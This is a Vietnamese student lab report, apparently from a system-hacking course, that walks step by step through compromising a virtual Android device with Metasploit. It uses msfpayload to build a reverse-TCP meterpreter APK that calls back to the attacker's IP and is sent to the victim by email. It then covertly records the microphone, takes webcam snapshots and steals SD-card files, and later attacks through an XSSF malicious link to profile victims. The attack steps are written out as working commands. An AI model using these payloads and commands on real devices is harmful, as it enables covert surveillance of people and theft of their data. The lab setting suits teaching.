  • 13. GVHD : VÕ ĐỖ THẮNG August 28, 2014 II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID: Trang 13 1. Các công cụ cần thi ết: Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị: - Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). - Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. - Cả 2 thiết bị đều có thể kết nối mạng. - Có tài khoản email để gửi và nhận file trên cả 2 thiết bị. 2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được internet. Vào Edit > Virtual Network Editor… Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở ô Bridged to.
  • 14. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig” Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng dụng *.apk và gửi qua email. Trang 14
  • 15. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên file>” Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk. - Tạo ứng dụng ReverseTCP có trên file là appsX.apk. - Địa chỉ IP máy tấn công là 192.168.149.136. - Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023). - Lưu file tại Desktop. Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: “msfconsole” Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh: “set payload android/meterpreter/reverse_tcp” “set lhost 192.168.149.136” “set lport 8080” Trang 15
  • 16. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công. Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP. Trang 16
  • 17. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân. Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được. Trang 17
  • 18. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 18 3. Khai thác thông tin hê thống: Xem thông tin hệ thống bằng lệnh “sysinfo”. 4. Ghi âm lén: Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh “record_mic”. File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali . 5. Khai thác webcam và chụp ảnh lén: Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã webcam>”.
  • 19. GVHD : VÕ ĐỖ THẮNG August 28, 2014 File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali . 6. Khai thác file hệ thống của máy nạn nhân: Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”. Trang 19
  • 20. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 20 7. Khai thác dữ liệu từ SDCARD: Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd Download” và lệnh liệt kê “ls”. Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. Ở đây dùng lệnh “download appsX.apk”. Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn công Kali. 8. Kết thúc tấn công: Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
  • 21. GVHD : VÕ ĐỖ THẮNG August 28, 2014 III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC: Trang 21 1. Các công cụ cần thi ết: Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần chuẩn bị như tấn công bằng file mã độc ở trên: - Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). - Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. - Cả 2 thiết bị đều có thể kết nối mạng. - Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị. 2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework “msfupdate” “cd /opt/metasploit/apps/pro/msf3” “svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
  • 22. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true Trang 22 Mode=Verbose” Bước 5: Thực hiện lệnh “xssf_urls” Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page…
  • 23. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: Trang 23 http://192.168.149.136:80/xssf/test.html Ta nhận được thông báo trên máy tấn công Kali: 3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn mã độc http://192.168.149.136:80/xssf/test.html 4. Xem thông tin về nạn nhân đang truy cập: Dùng lệnh “xssf_information <ID máy nạn nhân>” Ở đây ví dụ là “xssf_information 1”
  • 24. GVHD : VÕ ĐỖ THẮNG August 28, 2014 5. Khai thác dữ liệu từ máy nạn nhân:  Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có Trang 24 thể thao tác lên máy nạn nhân  Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: “use auxiliary/xssf/public/misc/alert” “run”
  • 25. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Ở máy nạn nhân sẽ nhận được cảnh báo XSSF Thoát ra msf bằng lệnh “Ctrl+C” > “back”  Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không bằng lệnh: “use auxiliary/xssf/public/misc/visited_pages” “run”  Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: “use auxiliary/gather/android_htmlfileprovider” “set SRVPORT 87” “set URIPATH /” “run” Trang 25
  • 26. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ Ta nhận được thông tin máy nạn nhân: 6. Thoát khỏi XSSF của Metasploit: Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit” Trang 26
  • 27. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 27 IV – NGUỒN THAM KHẢO http://www.oracle.com/technetwork/server-storage/ virtualbox/downloads/index.html http://www.genymotion.com/ http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://www.whitehat.vn/threads/ Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn